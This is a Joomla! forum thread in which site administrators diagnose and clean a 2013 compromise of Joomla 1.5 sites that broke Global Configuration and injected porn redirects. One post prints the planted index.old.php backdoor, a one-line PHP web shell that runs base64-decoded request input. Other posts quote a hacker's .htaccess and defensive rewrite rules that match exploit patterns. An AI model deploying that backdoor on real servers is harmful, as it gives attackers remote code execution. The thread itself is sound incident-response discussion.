The Joomla! Forum ™

When I click on the Global Configuration Icon I receive a "404 Not Found" error. I have Super Administration access and in the past have been able to access that page.

Also, when I try to insert a link in an article, the link box comes but all that shows in the Link Browser window is a "404 Not Found". That is a very recent error since a week ago that part was working. I haven't used the Global Configuration module in while so not sure when that went south.

I am not sure if those two errors are related or not.

I am using Version 1.5.21. I am very much a neophyte with Joomla having only taken over maintenance of the web site about 7 months ago and is which why it has not updated to a newer version (way out of my area of expertise).

I am having the EXACT same problem
I am on Version 1.5.15

we use Netfirms for our host provider and I am working with them on this issue.

Angela,

Please let me know what happens.

I did a backup of the site on Jan 9th. I noticed that many many of the files have a change date of Jan 12th. So not sure if that is when the problem started and whether it's a hacking or not.

will do... I haven't heard anything back yet, but I am finding more than just us that are using 1.5 that are experiencing same problems starting this week.

Ok, found out what the problem is. It appears we were hacked. A file called "index.old.php" was added to every single folder on our site. Probably a few thousand instances of that file. Also two other files were added. I did a search on my ftp site and that made it much easier to find the files.

I eliminated all instances of that "index.old.php" and I now have access go Global Configuration and the Insert/Edit link function. (until the next hack!)

An excellent article here: http://www.joshpate.com/2013/01/how-to- ... -web-site/

I know I should update my site to another version but do not feel confident enough right now to handle.

WOW! thanks. I had noticed that our folders all had modified date of 1/15. We had a 500 internal server down problem the same day and our website was down. they restored it but did not tell me what had happened. I suspect it is all related. I am using Filezilla now to search for all instances of file, thanks for tip on that one, too.

looks like it was this dude
http://www.ehackingnews.com/2013/01/Ind ... hmei7.html

It has set permissions on FTP to 550 denied. I am unable to delete or rename the file index.old.php through FTP. I have contacted support. I can do it through file manager on control panel, but I do not see a way to batch it and I am NOT going to sit there and delete 1300 files one at a time. geez

contents of file


<?php if(isset($_REQUEST["comment"])) { eval(base64_decode($_REQUEST["comment"])); exit; } else { die("404 Not Found"); }?>

no friggin' wonder...

You want to delete the file, don't rename that one. And yes you need to delete all of them before you get back the Configuration file and Insert/Edit Link "powers".

I am just learning about permission codes so can't help you there. The only thing I know is:

.htaccess file – 644 (Read and Write granted to you, Read-only to anyone else)
configuration.php – 444 (Read access only)
Directories – 755 (Read/Write/Execute to you, Read and Execute to anyone else)
Files – 644 (Read/Write to you, Read-only to anyone else)
Never use 777

yes, I plan to delete, but I was just testing the FTP permissions to see if it would even let me just rename it, and no... waiting on netfirms to delete files for me directly.

My Website back end is also giving me the 404 error message also when i try to access global config. Did someone hack every joomla 1.5 website? How can that happen?

If i have to search for and delete 1300 files one at a time that are somewhere on my server i think it will be easier to completely rebuild the website wouldn't it?

I was able to use FileZilla and go in via ftp. FileZilla has a search function and I used that and deleted them all at once. You also want to search for some other suspect files - see the link I included in one of the posts above.

I would assume if you know how to rebuilt your site you might know how to access your files via ftp. I would think eliminating the files easier than rebuilding.

the reason that I was unable to delete the files is that my host provider has limited the ftp use after the hack. they have also explained that this Base 64 hack is more intrusive than just deleting some files and other ones can be hidden to allow access and future destructive events in future. they have recommended that I contact sitelock to help with the thorough cleaning of site. I have contacted them and will see what they have to say. I appreciate your post as it led me directly to what the problem is and now I can go about solving it.

I got my global config page to come back up. I used FileZilla to search for all the index.old.php files. I had 7700 of them on my server. I then did a search for files on 2013-01-12 and did not find any other files added on that date.

I had the same problem and solve it.
Please check your access log files.
The attack took place from abot 2013-01-12 or 13.
The most important is to clear your "tmp" catalog in your Joomla sites.
Looks like it's only in Joomla 1.5 later versions are safe.
Look for files:
- index.old.php (in every catalog on your ftp server) delete via FileZilla
- kabe.php
- nes.php
- nwo.php
- zzzzx.php
Update to Joomla 2.5 and changing all passwords is the best solution.
As for now i have to delete over 30000 files (index.old.php)
By the way look for [ ** removed hacker name **].jpg also delete it.
And all of it came from Iran.
Hope this will help you all.

Also, check your images folder. I found an .htacces folder there with this in it

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

I also found a folder titled "pee" with a bunch of what appear to be empty txt files.

The problem according to the link below started with an older version of JCE - updated your editor to the latest version if you haven't already.

http://www.joshpate.com/2013/01/how-to- ... -web-site/

Okay i used filezilla to delete all these files. I still have a big problem with my website. If you go to my website on a mobile phone or pad and click on the screen(i havent figured out where exactly to click but it did it on my iphone) I was redirected to get a porn app for my phone and when i scrolled down to the bottom of my phone screen there was a buch of porn links and ads. Everyone else may want to check to make sure this is not happening on there sites when someone uses a cellphone to visit their site. Scroll down to the bottom of the home page and check to make sure. Mine has a link to pornotube. How can i remove that??? I need that off my website like yesterday. The link appears at the bottom of the page a few moments after you click on a photo.

Also another question. Can we update from 1.5 to 2.5 without having to completly rebuild our website so we don't have to worry about being hacked again?

our URL is http://www.kittycitynm.com

I was able to clean up mt site as indicated in my previous posts. Then my hosting company strongly suggested that I update to 2.5. There is also a vulnerability in the JCE editor even if you have 1.7.

So I had just backed up my site on jan 9th so kept that backup but if you don't have one make one.
Then I downloaded the 2.5 upgrade package
Then I downloaded a free program called Jupdater and installed that.
Using that program, I installed the 2.5 upgrade
See http://docs.joomla.org/Tutorial:Migrati ... Joomla_1.6
It went very smooth. Any extensions had to be reinstalled. Some other minor format, link issues but looks good now. And the back end go 2.5 so much better!
It's scary at first since I had no expertise in Joomla but after the upgrade it seems easy now.

yep, the JCE editor was the back door for my site as well. After the site was cleaned, I found a few more 1.txt and x.txt files on the site. I got rid of those, got rid of the old JCE editor and installed the new one, changed my configuration.php to 444 and blocked IP sites from Indonesia and Turkey through .htaccess. So far, no more activity, but I am watching like a hawk right now.

oh yeah, AND I took a full backup of my site files and brought them to my PC as well as my SQL database and plan to do this on a regular basis now. This was a serious wake up call for me.

The link you posted by Josh Pate was just the ticket. Yeah, I need to upgrade to 2.5 as well. I have been avoiding it, but these days, it just isn't smart to stay on older versions. Thanks for the migration link as well

Angela,

How do you block IP sites thorugh htaccess?

I am using filezilla and the first time i searched /administrator and found thousands of the index.old.php but it did not fix anything so i am going back and searching for all six of the files listed to search for. In the directory to search for i did not add a name but left the / i assume that would make filezilla search every folder? Now it is endlessly scrolling info and never seems to find any of the files. I have been waiting for two hours. Will it eventually finish or am i not using the filezilla correct?

Is there any of the moderators here or anyone that can help me get the infected files off of my website? I have been scanning for files for 12 hours today now with filezilla and I am not getting anymore of the index.old.php, or any of the other files listed on this thread I did find 6600 of the index.old.php files and one zzzzx.php and deleted them.

After deleting all this my website is stilll infected and shows porn links when viewed with a tablet or a phone. It is an emergency ... Animal Planet aired an episode with our rescue last night so we probably had thousands of people redirected to porn sites from our website and i cant seem to make any headway.

I am getting so frustrated I am starting to think I should delete my whole website that took months to build and start another website from scratch.

If anyone can please email or PM me.

this link is very useful
http://www.joshpate.com/2013/01/how-to- ... -web-site/

Here is what I did to clean it up and have not had it come back (yet)

1. clean your files - read the link above for those
2. upgrade your JCE editor to latest version
3. change permissions on your configuration.php file to 444 (you'll need to change it back to allow writing before you can make changes, but that is usually not a file that you mess with after initial setup)
4. block the IP addresses listed in the link above

add this to your .htacess file

# Begin IP blocking #
Order Allow,Deny
Deny from 114.79
Deny from 95
Allow from all
# End IP blocking #

Okay I have been trying to get past step one which is cleaning files. I started filezilla at 1:19pm yesterday and it is still scrolling endless garble this morning aat 5:59 searching in the root folder for:
index.old.php
kabe.php
nes.php
nwo.php
zzzzx.php
sejaeal.php
If I can not get past this first step i cant go any further. I deleted JCE editor and now i am using TinyMC
Also it has been awhile since i have worked with joomla and i am not certain where to make the changes on steps 3 and 4. Is that on my server or at the backend of my website?

OK, so you need to make sure that the configuration.php file and the .htaccess file have not been altered by the hacker. Do you know what should be there or have a old copy of them?

One way to tell is the go into Joomla and click on top left menu item SITE, there should be a pulldown menu and Global Configuration is one of them. See if you can click on it and get to window. If you can, then chances are that file is OK.

the configuration.php file lives in the main directory of your site, in your case most likely it is located in /public_html/kittycitynm.com/

you need to access it through your host provider control panel using their FILE MANAGER

navigate to file, check it and find option to change permissions, that window should pop up and check only the READ boxes (I think I attached a screen print of that)

.htaccess may be edited through the same FILE MANAGER window and just add the code shown above

Usually redirects are done in the .htaccess file, so review it carefully. (redirect 301 )

-------------------------------------------------------------------------------------------------------------------------------------------
A company that I hired to find/clean out the site also added this to the .htaccess file. I have left it in. I figure it all is better than the previous state of the site.

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits



Regarding Filezilla
when you look at a directory listing on the site, does it show 0 0 under the OWNER GROUP COLUMN? It should show something like 2076860 15000.

If it doesn't ask your host provider to reset the file permissions. I had to do this as well and then I had access to all files and when I scanned for them, I could actually delete them.

Another thing to look at:
If you are searching for more than one file, then make sure the argument box shows MATCH ANY OF THE FOLLOWING (default is Match ALL of the following).

If you have ownership of files (not=0), you should then be able to delete them.

I have felt so badly for you and have been watching your site come back to life. I like the look of it a lot and you are doing a good job! Did you upgrade to Joomla 2.5?
Thanks for the rescue work that you guys do and keep up the good work!